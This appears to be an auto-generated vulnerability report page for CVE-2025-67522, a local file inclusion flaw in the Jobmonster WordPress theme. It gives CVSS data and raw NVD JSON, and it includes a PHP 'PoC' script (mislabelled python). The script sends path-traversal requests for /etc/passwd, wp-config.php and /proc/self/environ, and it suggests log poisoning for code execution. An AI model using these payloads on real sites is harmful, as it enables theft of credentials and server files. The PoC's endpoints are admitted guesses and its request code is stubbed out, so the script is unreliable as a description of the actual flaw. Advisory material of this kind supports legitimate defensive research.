Security Vulnerability Report
中文
CVE-2025-67522 CVSS 7.5 HIGH

CVE-2025-67522

Published: 2025-12-09 16:18:26
Last Modified: 2026-04-27 18:16:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster noo-jobmonster allows PHP Local File Inclusion.This issue affects Jobmonster: from n/a through <= 4.8.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NooTheme Jobmonster <= 4.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-67522 PoC - NooTheme Jobmonster Local File Inclusion // Target: WordPress site with vulnerable noo-jobmonster theme <= 4.8.2 $target = "http://target-site.com"; // Vulnerable endpoint examples (path may vary based on installation) $vulnerable_paths = [ "/wp-content/themes/noo-jobmonster/controller.php", "/wp-content/themes/noo-jobmonster/admin/controller.php", "/wp-content/themes/noo-jobmonster/functions.php", "/wp-admin/admin.php?page=noo_jobmonster&action=include&file=" ]; echo "[*] CVE-2025-67522 Local File Inclusion PoC\n"; echo "[*] Target: $target\n\n"; // Common LFI targets $files = [ "../../../../../../etc/passwd", "../../../../../../var/www/html/wp-config.php", "../../../../../../../../../etc/passwd", "../../../../../../proc/self/environ" ]; foreach ($vulnerable_paths as $path) { echo "[*] Testing: $path\n"; foreach ($files as $file) { $url = $target . $path . "?file=" . urlencode($file); echo " [*] Trying: $file\n"; // In real attack, send request and check for file contents // $response = file_get_contents($url); // if (strpos($response, 'root:') !== false || strpos($response, '<?php') !== false) { // echo "[!] VULNERABLE! File contents leaked.\n"; // } } } echo "\n[!] Note: Modify paths based on target installation structure.\n"; echo "[!] For remote code execution, combine with log poisoning or PHP wrapper.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67522", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:25.680", "lastModified": "2026-04-27T18:16:40.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster noo-jobmonster allows PHP Local File Inclusion.This issue affects Jobmonster: from n/a through <= 4.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/noo-jobmonster/vulnerability/wordpress-jobmonster-theme-4-8-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}